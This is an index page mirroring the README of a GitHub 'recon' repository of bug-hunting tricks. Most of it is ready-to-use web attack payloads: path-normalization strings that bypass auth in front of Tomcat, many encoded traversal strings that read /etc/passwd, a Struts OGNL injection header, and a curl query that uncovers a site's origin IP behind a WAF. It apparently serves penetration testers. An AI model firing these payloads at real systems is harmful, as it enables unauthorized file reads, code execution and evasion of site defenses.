Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/venom26/recon

information gathering
https://github.com/venom26/recon

Last synced: 3 months ago
JSON representation

information gathering

Host: GitHub
URL: https://github.com/venom26/recon
Owner: venom26
Created: 2019-08-21T13:08:23.000Z (about 5 years ago)
Default Branch: master
Last Pushed: 2024-03-29T18:02:15.000Z (7 months ago)
Last Synced: 2024-06-07T00:32:31.004Z (5 months ago)
Language: Shell
Size: 7.03 MB
Stars: 265
Watchers: 5
Forks: 79
Open Issues: 3
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - venom26/recon - information gathering (Shell)

README

**Bug Hunting Tricks**

**Extracting links, paths from source of a website**
```
Use Xidel
https://github.com/benibela/xidel
Usage:-
xidel http://apple.com -f '//script/@src'
xidel http://apple.com -f '//link/@href'
xidel http://apple.com -f '//a/@href'

References:-
https://www.videlibri.de/xidel.html
```

**Bypasses For LFI, Auth Bypass**
```
api/v1/..%2f
api/v1/..;/
api/v1/../
api/v1..%00/
api/v1/..%0d/
api/v1/..%5c
api/v1/..\
api/v1/..%ff/
api/v1/%2e%2e%2f
api/v1/.%2e/
api/v1/%3f (?)
api/v1/%26 (&)
api/v1/%23 (#)
or
/foo;x=x/bar/
above tricks work well when you have a ngnix server in front of an tomcat
References:- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
```

```
../../../../../../../../../../../../etc/passwd%00
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%252e%252e%252fetc%252fpasswd
...//....//etc/passwd
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd

```

**Struts RCE**
```
Content-Type: ${#context["com.opensymphone.xwork2.dispatcher.HttpServletResponse"].addHeader("Struts-RCE",191*7)}.multipart/form-data
```

**WAF**
```
#Finding Origin IP
Check IP address history from https://viewdns.info/
or use below command
curl 'https://api.viewdns.info/iphistory/?domain=&apikey=&output=json' -H 'User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100' | jq . | grep ip | cut -d '"' -f4 | tail -n+2
References:- https://twitter.com/yassineaboukir/status/932908449775669248
https://github.com/christophetd/CloudFlair
```